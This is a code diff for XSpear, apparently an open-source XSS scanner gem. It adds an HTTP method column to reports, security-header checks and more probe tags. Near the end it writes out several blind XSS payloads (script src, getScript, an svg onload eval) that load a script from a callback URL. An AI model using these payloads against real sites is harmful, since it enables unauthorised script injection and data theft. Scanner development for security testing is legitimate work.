16
+ def initialize(url,starttime, method)
17
17
  @url = url
18
18
  @starttime = starttime
19
19
  @endtime = nil
20
20
  @issue = []
21
21
  @query = []
22
22
  @filtered_objects = {}
23
+ @method = method
23
24
  # type : i,v,l,m,h
24
25
  # param : paramter
25
26
  # type :
@@ -33,14 +34,14 @@ class XspearRepoter
33
34
  def add_issue_first(type, issue, param, payload, pattern, description)
34
35
  rtype = {"i"=>"INFO","v"=>"VULN","l"=>"LOW","m"=>"MIDUM","h"=>"HIGH"}
35
36
  rissue = {"f"=>"FILERD RULE","r"=>"REFLECTED","x"=>"XSS","s"=>"STATIC ANALYSIS","d"=>"DYNAMIC ANALYSIS"}
36
- @issue.insert(0,["-", rtype[type], rissue[issue], param, pattern, description])
37
+ @issue.insert(0,["-", rtype[type], rissue[issue], @method, param, pattern, description])
37
38
  @query.push payload
38
39
  end
39
40
 
40
41
  def add_issue(type, issue, param, payload, pattern, description)
41
42
  rtype = {"i"=>"INFO","v"=>"VULN","l"=>"LOW","m"=>"MIDUM","h"=>"HIGH"}
42
43
  rissue = {"f"=>"FILERD RULE","r"=>"REFLECTED","x"=>"XSS","s"=>"STATIC ANALYSIS","d"=>"DYNAMIC ANALYSIS"}
43
- @issue << [@issue.size, rtype[type], rissue[issue], param, pattern, description]
44
+ @issue << [@issue.size, rtype[type], rissue[issue], @method, param, pattern, description]
44
45
  @query.push payload
45
46
  end
46
47
 
@@ -77,11 +78,11 @@ class XspearRepoter
77
78
  end
78
79
  table = Terminal::Table.new
79
80
  table.title = "[ XSpear report ]".red+"\n#{rurl}\n#{@starttime} ~ #{@endtime} Found #{@issue.length} issues."
80
- table.headings = ['NO','TYPE','ISSUE','PARAM','PAYLOAD','DESCRIPTION']
81
+ table.headings = ['NO','TYPE','ISSUE', 'METHOD', 'PARAM', 'PAYLOAD','DESCRIPTION']
81
82
  table.rows = @issue
82
83
  #table.style = {:width => 80}
83
84
  puts table
84
- puts "< Not Filtered >".yellow
85
+ puts "< Available Objects >".yellow
85
86
  @filtered_objects.each do |key, value|
86
87
  eh = []
87
88
  tag = []
@@ -100,9 +101,9 @@ class XspearRepoter
100
101
  sc.push n.sub("XsPeaR","")
101
102
  end
102
103
  end
103
- puts " + Special Char: ".green+"#{sc.map(&:inspect).join(',').gsub('"',"")}"
104
- puts " + Event Handler: ".green+"#{eh.map(&:inspect).join(',')}"
105
- puts " + HTML Tag: ".green+"#{tag.map(&:inspect).join(',')}"
104
+ puts " + Available Special Char: ".green+"#{sc.map(&:inspect).join(',').gsub('"',"")}".gsub(',',' ')
105
+ puts " + Available Event Handler: ".green+"#{eh.map(&:inspect).join(',')}"
106
+ puts " + Available HTML Tag: ".green+"#{tag.map(&:inspect).join(',')}"
106
107
  end
107
108
  puts "< Raw Query >".yellow
108
109
  @query.each_with_index do |q, i|
data/lib/XSpear/version.rb CHANGED
@@ -1,3 +1,3 @@
1
1
  module XSpear
2
- VERSION = "1.0.5"
2
+ VERSION = "1.0.6"
3
3
  end
data/lib/XSpear.rb CHANGED
@@ -26,16 +26,17 @@ class XspearScan
26
26
  @output = output
27
27
  @verbose = verbose
28
28
  @blind_url = blind
29
- @report = XspearRepoter.new @url, Time.now
29
+ @report = XspearRepoter.new @url, Time.now, (@data.nil? ? "GET" : "POST")
30
30
  @filtered_objects = {}
31
31
  end
32
32
 
33
33
  class ScanCallbackFunc
34
- def initialize(url, method, query, response)
34
+ def initialize(url, method, query, response, report)
35
35
  @url = url
36
36
  @method = method
37
37
  @query = query
38
38
  @response = response
39
+ @report = report
39
40
  # self.run
40
41
  end
41
42
 
@@ -64,40 +65,92 @@ class XspearScan
64
65
  class CallbackNotAdded < ScanCallbackFunc
65
66
  def run
66
67
  if @response.body.include? @query
67
- log("i","reflected #{@query}")
68
+ time = Time.now
69
+ puts '[I]'.blue + " [#{time.strftime('%H:%M:%S')}] reflected #{@query}"
68
70
  [false, true]
69
71
  else
70
- [false, false]
72
+ [false, "Not reflected #{@query}"]
71
73
  end
72
74
  end
73
75
  end
74
76
 
77
+ class CallbackCheckHeaders < ScanCallbackFunc
78
+ def run
79
+ if !@response['Server'].nil?
80
+ # Server header
81
+ @report.add_issue("i","s","-","-","original query","Found Server: #{@response['Server']}")
82
+ end
83
+
84
+ if @response['Strict-Transport-Security'].nil?
85
+ # HSTS
86
+ @report.add_issue("i","s","-","-","original query","Not set HSTS")
87
+ end
88
+
89
+
90
+ if !@response['Content-Type'].nil?
91
+ @report.add_issue("i","s","-","-","original query","Content-Type: #{@response['Content-Type']}")
92
+ end
93
+
94
+
95
+ if !@response['X-XSS-Protection'].nil?
96
+ @report.add_issue("i","s","-","-","original query","Not set X-XSS-Protection")
97
+ end
98
+
99
+ if !@response['X-Frame-Options'].nil?
100
+ @report.add_issue("i","s","-","-","original query","X-Frame-Options: #{@response['X-Frame-Options']}")
101
+ else
102
+ @report.add_issue("l","s","-","-","original query","Not Set X-Frame-Options")
103
+ end
104
+
105
+
106
+ if !@response['Content-Security-Policy'].nil?
107
+ begin
108
+ csp = @response['Content-Security-Policy']
109
+ csp = csp.split(';')
110
+ r = " "
111
+ csp.each do |c|
112
+ d = c.split " "
113
+ r = r+d[0]+" "
114
+ end
115
+ @report.add_issue("i","s","-","-","original query","Set CSP(#{r})")
116
+ rescue
117
+ @report.add_issue("i","s","-","-","original query","CSP ERROR")
118
+ end
119
+ else
120
+ @report.add_issue("m","s","-","-","original query","Not Set CSP")
121
+ end
122
+
123
+
124
+ [false, "not reflected #{@query}"]
125
+ end
126
+ end
127
+
75
128
  class CallbackErrorPatternMatch < ScanCallbackFunc
76
129
  def run
77
130
  info = "Found"
78
131
  if @response.body.to_s.match(/(SQL syntax.*MySQL|Warning.*mysql_.*|MySqlException \(0x|valid MySQL result|check the manual that corresponds to your (MySQL|MariaDB) server version|MySqlClient\.|com\.mysql\.jdbc\.exceptions)/i)
79
- info = info + "MYSQL "
132
+ info = info + "MYSQL Error"
80
133
  end
81
134
  if @response.body.to_s.match(/(Driver.* SQL[\-\_\ ]*Server|OLE DB.* SQL Server|\bSQL Server.*Driver|Warning.*mssql_.*|\bSQL Server.*[0-9a-fA-F]{8}|[\s\S]Exception.*\WSystem\.Data\.SqlClient\.|[\s\S]Exception.*\WRoadhouse\.Cms\.|Microsoft SQL Native Client.*[0-9a-fA-F]{8})/i)
82
- info = info + "MSSQL "
135
+ info = info + "MSSQL Error"
83
136
  end
84
137
  if @response.body.to_s.match(/(\bORA-\d{5}|Oracle error|Oracle.*Driver|Warning.*\Woci_.*|Warning.*\Wora_.*)/i)
85
- info = info + "Oracle "
138
+ info = info + "Oracle Error"
86
139
  end
87
140
  if @response.body.to_s.match(/(PostgreSQL.*ERROR|Warning.*\Wpg_.*|valid PostgreSQL result|Npgsql\.|PG::SyntaxError:|org\.postgresql\.util\.PSQLException|ERROR:\s\ssyntax error at or near)/i)
88
- info = info + "Postgres "
141
+ info = info + "Postgres Error"
89
142
  end
90
143
  if @response.body.to_s.match(/(Microsoft Access (\d+ )?Driver|JET Database Engine|Access Database Engine|ODBC Microsoft Access)/i)
91
- info = info + "MSAccess "
144
+ info = info + "MSAccess Error"
92
145
  end
93
146
  if @response.body.to_s.match(/(SQLite\/JDBCDriver|SQLite.Exception|System.Data.SQLite.SQLiteException|Warning.*sqlite_.*|Warning.*SQLite3::|\[SQLITE_ERROR\])/i)
94
- info = info + "SQLite "
147
+ info = info + "SQLite Error"
95
148
  end
96
149
  if @response.body.to_s.match(/(Warning.*sybase.*|Sybase message|Sybase.*Server message.*|SybSQLException|com\.sybase\.jdbc)/i)
97
- info = info + "SyBase "
150
+ info = info + "SyBase Error"
98
151
  end
99
152
  if @response.body.to_s.match(/(Warning.*ingres_|Ingres SQLSTATE|Ingres\W.*Driver)/i)
100
- info = info + "Ingress "
153
+ info = info + "Ingress Error"
101
154
  end
102
155
 
103
156
  if info.length > 5
@@ -248,7 +301,17 @@ class XspearScan
248
301
  ]
249
302
  tags = [
250
303
  "script",
251
- "iframe"
304
+ "iframe",
305
+ "svg",
306
+ "img",
307
+ "video",
308
+ "audio",
309
+ "meta",
310
+ "object",
311
+ "embeded",
312
+ "style",
313
+ "frame",
314
+ "frameset"
252
315
  ]
253
316
  special_chars =[
254
317
  ">",
@@ -274,11 +337,12 @@ class XspearScan
274
337
  ]
275
338
 
276
339
  log('s', 'creating a test query.')
340
+ r.push makeQueryPattern('s', '', '', 'i', "-", CallbackCheckHeaders)
277
341
  r.push makeQueryPattern('d', 'XsPeaR"', 'XsPeaR"', 'i', "Found SQL Error Pattern", CallbackErrorPatternMatch)
278
342
  r.push makeQueryPattern('r', 'rEfe6', 'rEfe6', 'i', 'reflected parameter', CallbackStringMatch)
279
343
  # Check Special Char
280
344
  special_chars.each do |sc|
281
- r.push makeQueryPattern('f', "XsPeaR#{sc}>", "XsPeaR#{sc}", 'i', "not filtered "+"#{sc}".blue, CallbackNotAdded)
345
+ r.push makeQueryPattern('f', "#{sc}XsPeaR", "#{sc}XsPeaR", 'i', "not filtered "+"#{sc}".blue, CallbackNotAdded)
282
346
  end
283
347
 
284
348
  # Check Event Handler
@@ -306,8 +370,10 @@ class XspearScan
306
370
 
307
371
  # Check Blind XSS Payload
308
372
  if !@blind_url.nil?
309
- payload = "<script src=#{@blind_url}></script>"
310
- r.push makeQueryPattern('f', "\"'>#{payload}", "NOTDETECTED", 'i', "", CallbackNotAdded)
373
+ r.push makeQueryPattern('f', "\"'><script src=#{@blind_url}></script>", "NOTDETECTED", 'i', "", CallbackNotAdded)
374
+ r.push makeQueryPattern('f', "\"'><script>$.getScript('#{@blind_url}')</script>", "NOTDETECTED", 'i', "", CallbackNotAdded)
375
+ r.push makeQueryPattern('f', "\"'><svg onload=javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'#{@blind_url}\';d.body.appendChild(_)')>", "NOTDETECTED", 'i', "", CallbackNotAdded)
376
+ r.push makeQueryPattern('f', "\"'><iframe src=javascript:$.getScript('#{@blind_url}')></iframe>", "NOTDETECTED", 'i', "", CallbackNotAdded)
311
377
  end
312
378
 
313
379
  r = r.flatten
@@ -328,10 +394,10 @@ class XspearScan
328
394
  if result[0]
329
395
  log(node[:category], (result[1]).to_s.yellow+"[param: #{node[:param]}][#{node[:desc]}]")
330
396
  @report.add_issue(node[:category],node[:type],node[:param],node[:query],node[:pattern],node[:desc])
331
- elsif node[:callback] == CallbackNotAdded
397
+ elsif (node[:callback] == CallbackNotAdded) && (result[1].to_s == "true")
332
398
  @filtered_objects[node[:param].to_s].nil? ? (@filtered_objects[node[:param].to_s] = [node[:pattern].to_s]) : (@filtered_objects[node[:param].to_s].push(node[:pattern].to_s))
333
399
  else
334
- log('d', (result[1]).to_s)
400
+ log('d', "'#{node[:param]}' "+(result[1]).to_s)
335
401
  end
336
402
  rescue => e
337
403
  end
@@ -358,11 +424,11 @@ class XspearScan
358
424
 
359
425
  result = []
360
426
  if type == 's'
361
- result.push("inject": 'url',"param":"STATIC" ,"type": type, "query": @url, "pattern": pattern, "desc": desc, "category": category, "callback": callback)
362
- unless @data.nil?
427
+ if @data.nil?
428
+ result.push("inject": 'url',"param":"STATIC" ,"type": type, "query": @url, "pattern": pattern, "desc": desc, "category": category, "callback": callback)
429
+ else
363
430
  result.push("inject": 'body',"param":"STATIC" ,"type": type, "query": @url, "pattern": pattern, "desc": desc, "category": category, "callback": callback)
364
431
  end
365
- p result
366
432
  else
367
433
  uri = URI.parse(@url)
368
434
  begin
@@ -432,7 +498,7 @@ class XspearScan
432
498
  end
433
499
  end
434
500
  response = http.request(request)
435
- result = callback.new(uri.to_s, method, pattern, response).run
501
+ result = callback.new(uri.to_s, method, pattern, response, @report).run
436
502
  # result = result.run
437
503
  # p request.headers
438
504
  return result, response
metadata CHANGED
@@ -1,14 +1,14 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: XSpear
3
3
  version: !ruby/object:Gem::Version
4
- version: 1.0.5
4
+ version: 1.0.6
5
5
  platform: ruby
6
6
  authors:
7
7
  - hahwul
8
8
  autorequire:
9
9
  bindir: exe
10
10
  cert_chain: []
11
- date: 2019-07-22 00:00:00.000000000 Z
11
+ date: 2019-07-23 00:00:00.000000000 Z
12
12
  dependencies:
13
13
  - !ruby/object:Gem::Dependency
14
14
  name: colorize
@@ -144,6 +144,7 @@ executables:
144
144
  extensions: []
145
145
  extra_rdoc_files: []
146
146
  files:
147
+ - ".github/FUNDING.yml"
147
148
  - ".gitignore"
148
149
  - ".idea/XSpear.iml"
149
150
  - ".idea/encodings.xml"